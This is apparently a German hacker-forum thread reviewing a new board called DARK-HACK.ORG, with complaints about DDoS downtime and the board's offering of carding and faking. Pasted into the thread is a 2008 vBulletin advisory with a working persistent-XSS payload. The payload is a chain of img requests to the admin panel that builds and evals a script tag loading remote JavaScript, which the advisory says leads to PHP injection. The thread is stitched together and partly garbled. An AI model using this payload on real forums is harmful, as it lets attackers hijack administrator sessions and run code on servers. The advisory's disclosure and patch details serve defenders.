DARK-HACK.ORG - Das neue Board

nettes design!

zwar noch ein wenig leer, aber ich hoffe es füllt sich...potential hat es....

also anmelden anmelden anmelden!

Design ist ganz schick. Forum ist übersichtlich.
Werde mich aber vorerst nicht Anmelden da ich schon auf genug Foren bin.

Naja von mir auch Kritik:
-Es gibt genug solcher Foren warum sollte den eures anziehend wirken? (kommt mir nicht mit wir sind nett)
-Die Admins kennt keine Sau (auÃ?er dich, habe dich ab und zu auf FH gesehen)
-sieht so aus als hättet ihr keinen DoS Schutz - Board ist in 10 Tag down...

Also ganz nett aber wie gesagt es gibt viele solcher Foren.

Aber ihr habt ein paar Bugs

Mit 180 Benutzern waren die meisten Benutzer gleichzeitig online (15.02.2009 um 16:23).
Benutzer: 15, Aktive Benutzer: 15

macht irgendwie kein sinn oder ?

Wünsche euch noch viel erfolg

Naja Viel Glück

Syler

======================================================================

Advisory : XSS in admin logs
Release Date : July 06th 2008
Application : vBulletin
Version : vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower
Platform : PHP
Vendor URL : http://www.vbulletin.com/
Authors : Jessica Hope (jessicasaulhope@googlemail.com),
Friends who wish to remain anonymous.

=======================================================================

Overview

Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.

=======================================================================

Discussion

The XSS in question exists on the log viewing page of the admin control panel.

When a missing page is requested, a log is created in the admin area, however
the inputs to this log lack sanitation. The script name is taken from
basename(PHP_SELF), while the action is taken from _REQUEST['do']. Either one
can be used for introducing XSS vectors.

To highlight the severity and underline the fact that his vulnerability is
exploitable:

<html>
<body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
<img src="http://localhost/vB/upload/admincp/faq.
php/1?do=*/a%3D'document.wri'/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.
php/2?do=*/b%3D'te(%22<script
'/*" />
<img src="http://localhost/vB/upload/admincp/faq.
php/3?do=*/c%3D'src=http://'/*"
/>
<!--edit to match your data -->
<img src="http://localhost/vB/upload/admincp/faq.
php/4?do=*/d%3D'localhost/'/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.
php/5?do=*/e%3D''/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.
js></scrip'/*"
/>
<!-- end edit -->
<img src="http://localhost/vB/upload/admincp/faq.
php/7?do=*/g%3D't>%22)'/*" />
<img src="http://localhost/vB/upload/admincp/faq.
php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.
php/9?do=*/eval(h)/*" />
<img src="http://localhost/vB/upload/admincp/faq.
php/a0?do=*/</script>" />
</body>
</html>

You then need to send the admin to
adminlog.
php?do=view&script=&u=0&pp=15&orderby=script&page=1
and the XSS will render.

The limits on the XSS:
basename(PHP_SELF) is 50 characters max and no slashes
_REQUEST['do'] is limited to 20 characters, but no character restriction.

The tight character limits on the unsanitized parameters are not
mitigating the severity, as unlimited
attack space can be obtained as shown above.

As per my last exploits, all XSS in the vBulletin ACP can be used for
PHP injection instantly. This
is due to the design of the vBulletin hooks feature. As this
particular XSS is persistent and will
render in all major browsers it is particularly dangerous.

=======================================================================

Solution:

Update to vBulletin 3.7.2 PL1 or vBulletin 3.6.10 PL3

Don't trust PHP_SELF and sanitise all data that is going to be
displayed to the user

=======================================================================

- Carden
- Faken

Alleine wegen den 2 Punkten werde ihr mich dort nicht sehen...

ich sag nur endweder habt ist einen DownOfSystem oder euer Anbieter sendet mit 64K.

Das Layout an sich is net schlecht allerdings gibt es meiner Meinung zu viele Boards mit dem Style auserdem DARK-HACK.org is net gerade ein Name mit dem man sich aus der Masse abhebt. SeceneCoderZ hat was aber Dark-Hack hört sich für mich wie n möchtegerne whatever an.

Everything That Has A Beginning Has An End.

Viel erfolg // Kleiner Tipp :

Wenn viele Leute etwas dummes tun bleibt es trozdem eine Dummheit.

In dem Sinne
MfG

TheGenesis -- The Prophet

Das Prob ist das ich nicht auf die Seite komme.

EDIT: nur ganz langsam, kann es sein dass ihr schon unter DDoS steht?

Das Style bzw Layout währe mir persöhnlich so ziehmlich von egal wenn das nivoue und die alters gruppe des boards passt.

Beispiel
Es gibt ja schlie�lich auch genug leute mit dem mächtigen wort "Hacker" in der signatur (design)...einige heben sich von der masse ab...andere nicht. (kompetenz)

DownOfSystem? Ich kenne nur Denial of Service.

Zitat von till7;10410

Ich bin kein möchtegern HaXXor

Wie gesagt:

DAS BOARD WURDE NICHT VON MIR AUFGEBAUT
ICH KÃ?MMERTE MICH NUR UM DEN STYLE

Und dannach sollte ich das Board vorstellen weil anscheinend der "Admin" hier nicht angemeldet ist...

DDoS ja.. wird eine andere Seite angegriffen und dann triffts uns auch -.-

Siehe auch: accz-base.ath.cx
oder darksn0w-hosting.com

sind auch down...

Alles anzeigen

Das Board ist eigentlich vom Design nicht schlecht.
Auch wenns schon sehr viele solcher Boards gibt sollte man trotzdem jedem eine Chance geben und erstmal nur objektiv urteilen =P
Aber was ich wirklich schlecht finde ...
Als Admin sollte man auch wenn man nicht Gründer des Boards ist zu diesem stehn und alles was schlecht läuft nicht von sich weisen .
Sowas wie ich kümmere mich ja nur um ... gefällt mir einfach nicht dann lass dich mit diesem Board nicht in Verbindung bringen und gut ist . Aber zieh nicht sobald bisschen Kritik kommt den Schwanz ein.
Aber meinen Segen habter xD Wenns gut läuft dann glückwunsch wenn nicht dann macht ihr irgendwas falsch